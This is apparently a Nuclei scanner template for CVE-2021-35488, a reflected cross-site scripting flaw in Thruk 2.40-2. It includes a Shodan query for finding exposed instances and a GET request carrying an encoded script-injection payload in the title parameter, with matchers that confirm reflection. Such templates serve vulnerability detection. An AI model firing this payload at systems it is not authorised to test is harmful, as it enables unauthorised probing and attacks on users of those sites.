id: CVE-2021-35488 info: name: Thruk 2.40-2 - Cross Site Scripting author: arafatansari severity: medium description: | Thruk 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] Reflected XSS via the host or title parameter. An attacker could inject arbitrary JavaScript into status.cgi. The payload would be triggered every time an authenticated user browses the page containing it. reference: - https://www.gruppotim.it/redteam - https://nvd.nist.gov/vuln/detail/CVE-2021-35488 - https://www.thruk.org/changelog.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-35488 cwe-id: CWE-79 metadata: shodan-query: http.html:"Thruk" verified: "true" tags: cve,cve2021,thruk,xss requests: - method: GET path: - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "'>" - "Thruk Monitoring" condition: and - type: status status: - 401